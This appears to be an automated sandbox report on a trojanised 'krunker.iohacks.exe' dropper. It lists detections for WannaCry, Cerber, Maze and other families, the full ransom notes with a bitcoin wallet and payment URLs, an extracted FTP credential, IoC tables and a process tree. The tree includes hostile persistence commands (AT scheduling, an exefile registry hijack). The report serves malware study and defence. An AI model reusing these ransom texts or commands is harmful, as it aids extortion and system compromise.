cerber | 892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba

Resubmissions

02-09-2024 06:59

240902-hsk4hawbnd 10

02-09-2024 06:58

240902-hrpqaswbmb 10

02-09-2024 02:33

240902-c16ghszgkh 10

16-04-2024 14:39

240416-r1ca1ace39 10

Analysis

max time kernel
4s
max time network
1207s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
10-04-2024 08:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

krunker.iohacks.exe
Size

30.9MB
MD5

2850f1cb75953d9e0232344f6a13bf48
SHA1

141ab8929fbe01031ab1e559d880440ae931cc16
SHA256

892f11af94dea87bc8a85acdb092c74541b0ab63c8fcc1823ba7987c82c6e9ba
SHA512

25551eb0fbca013bcebd514eb72185e157a07f116a6973bfe4b728febcefc7044a816c5c70048c3fda2eeb4ce53b52bd7b19ef1ef851a0f4fc90451e60540d6d
SSDEEP

786432:j8Zic+QKJObt2u8xQYcLpoTEjoAsM0D0EHShV/:j8YQzB8xQzLp+nAV0BK

Score

10^/10

cerber dcrat maze neshta ramnit troldesh wannacry banker discovery evasion infostealer persistence ransomware rat spyware stealer trojan upx worm

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
files.000webhost.com
Port:
21
Username:
fcb-aws-host-4

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RarSFX0\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Extracted

Path

C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\_R_E_A_D___T_H_I_S___Y4BWWGQ_.txt

Family

cerber

Ransom Note

Hi, I'am CRBR ENCRYPTOR ;) ----- ALL YOUR DOCUMENTS, PH0T0S, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ----- The only one way to decrypt your files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the special file (*_R_E_A_D___T_H_I_S_*) with complete instructions how to decrypt your files. If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC, follow the instructions below: ----- 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://xpcx6erilkjced3j.onion/65A2-CA4A-3F69-0098-B994 Note! This page is available via "Tor Browser" only. ----- Also you can use temporary addresses on your personal page without using "Tor Browser". ----- 1. http://xpcx6erilkjced3j.1n5mod.top/65A2-CA4A-3F69-0098-B994 2. http://xpcx6erilkjced3j.19kdeh.top/65A2-CA4A-3F69-0098-B994 3. http://xpcx6erilkjced3j.1mpsnr.top/65A2-CA4A-3F69-0098-B994 4. http://xpcx6erilkjced3j.18ey8e.top/65A2-CA4A-3F69-0098-B994 5. http://xpcx6erilkjced3j.17gcun.top/65A2-CA4A-3F69-0098-B994 ----- Note! These are temporary addresses! They will be available for a limited amount of time! -----

URLs

http://xpcx6erilkjced3j.onion/65A2-CA4A-3F69-0098-B994

http://xpcx6erilkjced3j.1n5mod.top/65A2-CA4A-3F69-0098-B994

http://xpcx6erilkjced3j.19kdeh.top/65A2-CA4A-3F69-0098-B994

http://xpcx6erilkjced3j.1mpsnr.top/65A2-CA4A-3F69-0098-B994

http://xpcx6erilkjced3j.18ey8e.top/65A2-CA4A-3F69-0098-B994

http://xpcx6erilkjced3j.17gcun.top/65A2-CA4A-3F69-0098-B994

Extracted

Path

C:\PerfLogs\DECRYPT-FILES.txt

Family

maze

Ransom Note

Attention! ---------------------------- | What happened? ---------------------------- We hacked your network and now all your files, documents, photos, databases, and other important data are safely encrypted with reliable algorithms. You cannot access the files right now. But do not worry. You can get it back! It is easy to recover in a few steps. We have also downloaded a lot of private data from your network, so in case of not contacting us as soon as possible this data will be released. If you do not contact us in a 3 days we will post information about your breach on our public news website and after 7 days the whole downloaded info. To see what happens to those who don't contact us, google: * Southwire Maze Ransomware * MDLab Maze Ransomware * City of Pensacola Maze Ransomware After the payment the data will be removed from our disks and decryptor will be given to you, so you can restore all your files. ---------------------------- | How to contact us and get my files back? ---------------------------- The only method to restore your files and be safe from data leakage is to purchase a unique for you private key which is securely stored on our servers. To contact us and purchase the key you have to visit our website in a hidden TOR network. There are general 2 ways to reach us: 1) [Recommended] Using hidden TOR network. a) Download a special TOR browser: https://www.torproject.org/ b) Install the TOR Browser. c) Open the TOR Browser. d) Open our website in the TOR browser: http://aoacugmutagkwctu.onion/6d4d0cdc4956aaee e) Follow the instructions on this page. 2) If you have any problems connecting or using TOR network a) Open our website: https://mazedecrypt.top/6d4d0cdc4956aaee b) Follow the instructions on this page. Warning: the second (2) method can be blocked in some countries. That is why the first (1) method is recommended to use. On this page, you will see instructions on how to make a free decryption test and how to pay. Also it has a live chat with our operators and support team. ---------------------------- | What about guarantees? ---------------------------- We understand your stress and worry. So you have a FREE opportunity to test a service by instantly decrypting for free three files from every system in your network. If you have any problems our friendly support team is always here to assist you in a live chat! P.S. Dear system administrators, do not think you can handle it by yourself. Inform leadership as soon as possible. By hiding the fact of the breach you will be eventually fired and sometimes even sued. ------------------------------------------------------------------------------- THIS IS A SPECIAL BLOCK WITH A PERSONAL AND CONFIDENTIAL INFORMATION! DO NOT TOUCH IT WE NEED IT TO IDENTIFY AND AUTHORIZE YOU ---BEGIN MAZE KEY--- BcSomnIuEl7tnlyYSWMjmmTh+VmHuJMIuEkdJ7fpDLF8m8cfCfGGyoFgK+dEUwlXbrODpr6tbOh/Xpq4sGi3SOFfdz5lcanf1rkpTkJBIbxnA8IID8mA+2du8tn378cEMSNPKXUw4Oeq0dLLaL9coyKcDb/iwICdxjgzK1V2lo1IDVpyszWiOb9+x6sQl/OazIBA9nsljhOlAsTdvwN0hEmdPzWFk+LS2apCDzOas9+nwPFlzCNHggUEzBUqTfVg3S4/Uf/hLLAF/qCAJ3A2PQ9wSJJDHYk0T4xT2hnXT3JOyFXC0N17czBsEjWqo8HaAX60lQXuyjf0zu9H0hiIu/o50hLQJo+wnRnOZAJM9rJntnkFkr2y4ascxQCKEsdC1DOj0VNpP8gfhH29FbkkkCm8KHsJhNdwPJ0sTo0W/lG/PyoxmxOuADLbxLI8pb4KLsOMkETJoAYTxAA8xBVAQMjge5l6cCV/j9NC0bvU/7ODtoLsDKh173vfjb3nS8ZFHeZRh4ZwULM1VcRR8W9TqQXZJfGqFK3JDbp2dG2uyIym4ePslF9OdGzw1SkOKWHjeaY7zRLc04K2fOddf9L+I0T89YnYZ6XQtbVmqZ70pfhODuRDtGDVHy5Hddq8FpTEX4InHWD/0Itiub9BlFTW30AQyZo89DpaSEpyHsyNV7i0auFFUHj43iItaXNaHytqPl+6yN6Mxq0UrcC1fnCtDL/VjLk3/OFzQ3vUlu0GAxvOaMQLUb1UTPmlJRwhLl7KPrZDOS1IGgF0xTn4zpRacBvt9eNq3K/NY9uoQe/9T0FmQSi/XGwaYF0rW69pKo263H6T7zse9NmAAfuXHEANVhvoxpfikj8vK1lIP6V4kuwuOizQuZAC8tDSRPIR8nU2EU4ljLm9SLr3I76/p4lvFBrpbm+2r/JqwBn01luSVDP0+Upma5v6u1eFTergM/VsAVn4/9mNFNf1+1EHNEUZ5QbzEN0D7jRfurPTFzHP+rK8sfxuEieTHsVbInKX56k6egNdLZAQLPqYeSWX59DB4KlsHFW2gSuOxJvHxK88/vwzFsodrJueu41rn6HV+bju4KYoFsOvh68C1Jga28RsjpYHc6ycrAK+rWXudrhdOZ2i5Kccj+ih2cdDi+E4gXSAyBP6SW+xfGNKTGWXobqdbHfiOEOAFO24M8Df2xgndNvVe6NrigL46nWDNjIxgj87r51rlDI79Kf6vjLyOf6b5r6Y5f5MfPPLj48GQTszMe/xWtumPxQwG6mMTwDVCjhZmsKNsftlm5fKTJA+RkbqWBuRJY3WYzvX/QSWZU38OtSywX1FYlkLSicfAljbIPs0q7GQTdK93TOr+do8OGeois30CAskXvnL3Wv6Pcrr6uIEAB9+dZQhgzq7gi3rqhMkujQDqEZpjeNzbBonOYq/S3SJf8a7T5gXbGOKXXFtT6A3RWW5HW7j+qjEvijDglMefVlg2+dWe58Dv9QMqJex7sl3sAgnSbaoweWOPIxXYdZH8La4q1dGrj0h+J3sDTZOMDZ8Dq52cvG7cuAJB9al1Ki+tkXgE2WUBt/I4pyRGcpVaw14kl8ZVgiSJXlhGibsQi074/QqyJNhODnsGJNoF9h2d0O08WLdXod0Mic6ILVsQVriEiOrnsHHz+EEWL+JsONZ/GfPRKzpYVFQdurMj/hBq42vgL+lkgVypO/N8kh8FaaNK1qFGucwRvh04GBpu1ADP0fOFtpTdRu5+6PRL331K8vFbbOLwOcwW3WWYcfoG6sWokJnF/AdKncLdz3+f4789OPy+hiu/VFEehiNLPE/2bRbQ4c9/yF/QSrnH/gDrPRz1E/rAPDspSOsOxkuyBJ4zv2DGaDuFJQ4rCl1bhyW4JXv55m4c/MA61sLvXeVv4tKkjFo78YcdmriKr/+dZWNEPLfagvQI9+UUnIm1m+ZLUyOvU4RO4m15qykrpx16Q7L+PaHNB9AmKqOMMZXG7U2CVo8q2gOzTLIaf2FnqMQeS5cRQcFqqyBa26ryTRuN5d/3l3VJr40BpwbBBR46GnShGdMOT42hXVgLq240Zw0xXgyheJGC17NTVEoGW+n6iIt3rB7iZDUzJPREdmN+KNseJK+QWtXu7etfE1FlMtKSBdlQ2XIGkJj5eUVAoHDqjh+g7Q8ChBOwrwogarJDDdad3rsF0ahkx7+0sHJx9REM0yA7Blp5p9R9MOLdNb9a5TN1onB0Z2EzHHEgFjh3yqxKgoiNgBkADQAZAAwAGMAZABjADQAOQA1ADYAYQBhAGUAZQAAABCAYBoMQQBkAG0AaQBuAAAAIiZXAE8AUgBLAEcAUgBPAFUAUABcAFUATwBLAEwAWQBXAFkASAAAACoMbgBvAG4AZQB8AAAAMh5XAGkAbgBkAG8AdwBzACAAMQAwACAAUAByAG8AAAA6KHwAZABlAHAAcgBlAGMAYQB0AGUAZAAgAD4AIAB2ADIALgAzAHwAAABCVnwAQwBfAEYAXwAxADkANQAxADMALwAyADQAMQAzADYAMQB8AEQAXwBVAF8AMAAvADAAfABGAF8ARgBfADIAMAA0ADEAMwAvADIAMAA0ADcAOQB8AAAASABQQFiJCGCJCGiJCHCOod9yeAyAAQGKAQUyLjMuMQ== ---END MAZE KEY---

URLs

http://aoacugmutagkwctu.onion/6d4d0cdc4956aaee

https://mazedecrypt.top/6d4d0cdc4956aaee

Signatures

Cerber
Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.
ransomware cerber
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Neshta payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x000700000001abf2-26.dat	family_neshta
behavioral2/files/0x0007000000016929-285.dat	family_neshta
behavioral2/files/0x000700000001ac48-422.dat	family_neshta
behavioral2/memory/5248-1576-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/2852-1715-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

Maze
Ransomware family also known as ChaCha.
trojan ransomware maze
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4492	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5772	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6104	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5372	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4544	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2452	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6896	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5188	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5820	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7968	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6576	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	276	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3004	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1092	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3856	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4816	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3604	4392	schtasks.exe	96
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	10520	4392	schtasks.exe	96

Ramnit
Ramnit is a versatile family that holds viruses, worms, and Trojans.
trojan spyware stealer worm banker ramnit
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
ransomware trojan troldesh
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
behavioral2/memory/5844-1920-0x0000000000BF0000-0x0000000000C84000-memory.dmp	dcrat
behavioral2/files/0x000700000001ae4b-2400.dat	dcrat
behavioral2/files/0x000800000001afd3-12423.dat	dcrat

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Contacts a large (1235) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid	Process
5076	netsh.exe
4860	netsh.exe
2396	netsh.exe
1692	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 13 IoCs

Processes:

4363463463464363463463463.exebot.exe[email protected][email protected][email protected]RIP_YOUR_PC_LOL.exeska2pwej.aeh.exe1.exex2s443bc.cs1.exeska2pwej.aeh.tmpx2s443bc.cs1.tmpbot.exetaskdl.exe

pid	Process
4848	4363463463464363463463463.exe
2852	bot.exe
4568	[email protected]
4548	[email protected]
4324	[email protected]
1092	RIP_YOUR_PC_LOL.exe
3592	ska2pwej.aeh.exe
4364	1.exe
760	x2s443bc.cs1.exe
488	ska2pwej.aeh.tmp
3728	x2s443bc.cs1.tmp
1532	bot.exe
5112	taskdl.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exe

pid	Process
3328	icacls.exe
5428	icacls.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

bot.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	bot.exe

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/4548-97-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4548-92-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4548-238-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4548-254-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/4548-240-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/1376-698-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral2/memory/3928-943-0x0000000000400000-0x000000000043D000-memory.dmp	upx
behavioral2/memory/4548-1106-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/5336-1069-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral2/memory/2996-918-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral2/memory/5264-1341-0x0000000000400000-0x0000000000416000-memory.dmp	upx
behavioral2/memory/4548-1717-0x0000000000400000-0x00000000005DE000-memory.dmp	upx
behavioral2/memory/5264-1770-0x0000000000400000-0x0000000000416000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

[email protected]

description	ioc	Process
File opened (read-only)	\??\h:	[email protected]
File opened (read-only)	\??\o:	[email protected]
File opened (read-only)	\??\r:	[email protected]
File opened (read-only)	\??\s:	[email protected]
File opened (read-only)	\??\w:	[email protected]
File opened (read-only)	\??\p:	[email protected]
File opened (read-only)	\??\v:	[email protected]
File opened (read-only)	\??\x:	[email protected]
File opened (read-only)	\??\z:	[email protected]
File opened (read-only)	\??\i:	[email protected]
File opened (read-only)	\??\k:	[email protected]
File opened (read-only)	\??\l:	[email protected]
File opened (read-only)	\??\m:	[email protected]
File opened (read-only)	\??\n:	[email protected]
File opened (read-only)	\??\q:	[email protected]
File opened (read-only)	\??\u:	[email protected]
File opened (read-only)	\??\y:	[email protected]
File opened (read-only)	\??\a:	[email protected]
File opened (read-only)	\??\b:	[email protected]
File opened (read-only)	\??\e:	[email protected]
File opened (read-only)	\??\g:	[email protected]
File opened (read-only)	\??\j:	[email protected]
File opened (read-only)	\??\t:	[email protected]

Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs

Web Service

T1102

Processes:

flow	ioc
3175	iplogger.org
3621	raw.githubusercontent.com
3227	raw.githubusercontent.com
3670	pastebin.com
3674	pastebin.com
1904	discord.com
3228	raw.githubusercontent.com
3622	raw.githubusercontent.com
17	iplogger.org
3174	iplogger.org
3347	bitbucket.org
3348	bitbucket.org
3880	discord.com

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
2626	whatismyipaddress.com
2629	whatismyipaddress.com
3276	api.myip.com
3278	api.myip.com
3282	ipinfo.io
3283	ipinfo.io
3634	ip-api.com

Drops file in Windows directory 1 IoCs

Processes:

bot.exe

description	ioc	Process
File opened for modification	C:\Windows\svchost.com	bot.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid	Process
6360	sc.exe
6516	sc.exe
6624	sc.exe
6616	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 11 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
6496	6368	WerFault.exe	237
7048	596	WerFault.exe	292
4364	8116	WerFault.exe	336
2704	8116	WerFault.exe	336
3432	8116	WerFault.exe	336
6448	8116	WerFault.exe	336
8052	8116	WerFault.exe	336
7976	8116	WerFault.exe	336
5584	8116	WerFault.exe	336
4864	8116	WerFault.exe	336
272	1692	WerFault.exe	439

Creates scheduled task(s) 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

pid	Process
6576	schtasks.exe
4816	schtasks.exe
4492	schtasks.exe
6104	schtasks.exe
6896	schtasks.exe
3004	schtasks.exe
1092	schtasks.exe
10520	schtasks.exe
5372	schtasks.exe
4544	schtasks.exe
2452	schtasks.exe
5188	schtasks.exe
7968	schtasks.exe
5772	schtasks.exe
5820	schtasks.exe
276	schtasks.exe
3856	schtasks.exe
3604	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Processes:

vssadmin.exe

pid	Process
4396	vssadmin.exe

Kills process with taskkill 2 IoCs

evasion

Processes:

taskkill.exetaskkill.exe

pid	Process
2316	taskkill.exe
7560	taskkill.exe

Modifies registry class 1 IoCs

Processes:

bot.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	bot.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
2492	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

NOTEPAD.EXE

pid	Process
5160	NOTEPAD.EXE

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

Processes:

PING.EXEPING.EXE

pid	Process
5212	PING.EXE
3432	PING.EXE

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

4363463463464363463463463.exe

description	pid	Process
Token: SeDebugPrivilege	4848	4363463463464363463463463.exe

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

krunker.iohacks.execmd.exe[email protected]RIP_YOUR_PC_LOL.exeska2pwej.aeh.exex2s443bc.cs1.exebot.exe1.exe[email protected]

description	pid	Process	procid_target
PID 1992 wrote to memory of 64	1992	krunker.iohacks.exe	72
PID 1992 wrote to memory of 64	1992	krunker.iohacks.exe	72
PID 1992 wrote to memory of 64	1992	krunker.iohacks.exe	72
PID 64 wrote to memory of 4848	64	cmd.exe	75
PID 64 wrote to memory of 4848	64	cmd.exe	75
PID 64 wrote to memory of 4848	64	cmd.exe	75
PID 64 wrote to memory of 2852	64	cmd.exe	76
PID 64 wrote to memory of 2852	64	cmd.exe	76
PID 64 wrote to memory of 2852	64	cmd.exe	76
PID 64 wrote to memory of 4568	64	cmd.exe	78
PID 64 wrote to memory of 4568	64	cmd.exe	78
PID 64 wrote to memory of 4568	64	cmd.exe	78
PID 64 wrote to memory of 4548	64	cmd.exe	79
PID 64 wrote to memory of 4548	64	cmd.exe	79
PID 64 wrote to memory of 4548	64	cmd.exe	79
PID 64 wrote to memory of 4324	64	cmd.exe	80
PID 64 wrote to memory of 4324	64	cmd.exe	80
PID 64 wrote to memory of 4324	64	cmd.exe	80
PID 64 wrote to memory of 1092	64	cmd.exe	81
PID 64 wrote to memory of 1092	64	cmd.exe	81
PID 64 wrote to memory of 1092	64	cmd.exe	81
PID 4324 wrote to memory of 2404	4324	[email protected]	82
PID 4324 wrote to memory of 2404	4324	[email protected]	82
PID 4324 wrote to memory of 2404	4324	[email protected]	82
PID 4324 wrote to memory of 3328	4324	[email protected]	83
PID 4324 wrote to memory of 3328	4324	[email protected]	83
PID 4324 wrote to memory of 3328	4324	[email protected]	83
PID 64 wrote to memory of 3592	64	cmd.exe	84
PID 64 wrote to memory of 3592	64	cmd.exe	84
PID 64 wrote to memory of 3592	64	cmd.exe	84
PID 1092 wrote to memory of 4364	1092	RIP_YOUR_PC_LOL.exe	85
PID 1092 wrote to memory of 4364	1092	RIP_YOUR_PC_LOL.exe	85
PID 1092 wrote to memory of 4364	1092	RIP_YOUR_PC_LOL.exe	85
PID 64 wrote to memory of 760	64	cmd.exe	89
PID 64 wrote to memory of 760	64	cmd.exe	89
PID 64 wrote to memory of 760	64	cmd.exe	89
PID 3592 wrote to memory of 488	3592	ska2pwej.aeh.exe	90
PID 3592 wrote to memory of 488	3592	ska2pwej.aeh.exe	90
PID 3592 wrote to memory of 488	3592	ska2pwej.aeh.exe	90
PID 760 wrote to memory of 3728	760	x2s443bc.cs1.exe	91
PID 760 wrote to memory of 3728	760	x2s443bc.cs1.exe	91
PID 760 wrote to memory of 3728	760	x2s443bc.cs1.exe	91
PID 2852 wrote to memory of 1532	2852	bot.exe	92
PID 2852 wrote to memory of 1532	2852	bot.exe	92
PID 2852 wrote to memory of 1532	2852	bot.exe	92
PID 4364 wrote to memory of 516	4364	1.exe	212
PID 4364 wrote to memory of 516	4364	1.exe	212
PID 4568 wrote to memory of 5076	4568	[email protected]	94
PID 4568 wrote to memory of 5076	4568	[email protected]	94
PID 4568 wrote to memory of 5076	4568	[email protected]	94
PID 4324 wrote to memory of 5112	4324	[email protected]	98
PID 4324 wrote to memory of 5112	4324	[email protected]	98
PID 4324 wrote to memory of 5112	4324	[email protected]	98
PID 4324 wrote to memory of 2468	4324	[email protected]	182
PID 4324 wrote to memory of 2468	4324	[email protected]	182
PID 4324 wrote to memory of 2468	4324	[email protected]	182

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid	Process
2592	attrib.exe
5344	attrib.exe
2404	attrib.exe

C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe
"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:64
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe
    "4363463463464363463463463.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4848
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\VLTKNH~1.EXE"
      4⤵
      PID:6020
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\VLTKNH~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\VLTKNH~1.EXE
        5⤵
        
        PID:6000
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ttt01.exe"
      4⤵
      PID:3340
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ttt01.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ttt01.exe
        5⤵
        
        PID:2064
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe"
      4⤵
      PID:3836
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe
        5⤵
        
        PID:960
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C AT /delete /yes
        6⤵
        
        PID:5320
        
        C:\Windows\SysWOW64\at.exe
        
        AT /delete /yes
        7⤵
        
        PID:5944
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
        6⤵
        
        PID:908
        
        C:\Windows\SysWOW64\at.exe
        
        AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\RVHOST.exe
        7⤵
        
        PID:5204
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup8.exe"
      4⤵
      PID:5928
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup8.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ISetup8.exe
        5⤵
        
        PID:2400
      - C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\U1UO0~1.EXE"
        6⤵
        
        PID:516
        
        C:\Users\Admin\AppData\Local\Temp\U1UO0~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\U1UO0~1.EXE
        7⤵
        
        PID:500
        
        C:\Windows\svchost.com
        
        "C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\IDHIIJJJKE.exe"
        8⤵
        
        PID:3340
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\IDHIIJJJKE.exe
        9⤵
        
        PID:3796
        
        C:\Users\Admin\AppData\Local\Temp\IDHIIJJJKE.exe
        
        C:\Users\Admin\AppData\Local\Temp\IDHIIJJJKE.exe
        10⤵
        
        PID:5412
        
